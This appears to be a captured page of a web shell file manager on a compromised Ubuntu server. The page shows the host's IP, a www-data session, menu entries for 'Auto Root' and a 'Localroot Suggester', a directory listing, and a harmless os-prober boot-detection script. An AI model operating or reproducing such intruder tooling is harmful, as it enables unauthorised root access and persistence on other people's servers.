Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
os-probes /
mounted /
Delete
Unzip
Name
Size
Permission
Date
Action
efi
[ DIR ]
drwxr-xr-x
2017-05-04 13:01
05efi
1.9
KB
-rwxr-xr-x
2014-11-13 05:02
10freedos
517
B
-rwxr-xr-x
2012-03-16 03:01
10qnx
390
B
-rwxr-xr-x
2011-03-23 03:00
20macosx
719
B
-rwxr-xr-x
2012-03-16 03:01
20microsoft
4.27
KB
-rwxr-xr-x
2015-11-20 11:12
30utility
863
B
-rwxr-xr-x
2012-03-16 03:01
40lsb
891
B
-rwxr-xr-x
2011-01-20 08:59
70hurd
247
B
-rwxr-xr-x
2015-10-18 05:03
80minix
431
B
-rwxr-xr-x
2012-03-16 03:01
83haiku
883
B
-rwxr-xr-x
2012-08-19 03:01
90linux-distro
4.76
KB
-rwxr-xr-x
2012-11-27 03:02
90solaris
385
B
-rwxr-xr-x
2011-01-20 08:59
Save
Rename
#!/bin/sh set -e . /usr/share/os-prober/common.sh partition="$1" dir="$2" type="$3" # Weed out stuff that doesn't apply to us case "$type" in minix|minix2|ext2) ;; *) exit 1 ;; esac if [ -f "$dir/minix" ] || [ -e "$dir/boot/image_big" ]; then if [ -e "$dir/boot/image_latest" ]; then boot="minix" else boot="chain" fi label="$(count_next_label Minix)" result "$partition:Minix:$label:$boot" exit 0 else exit 1 fi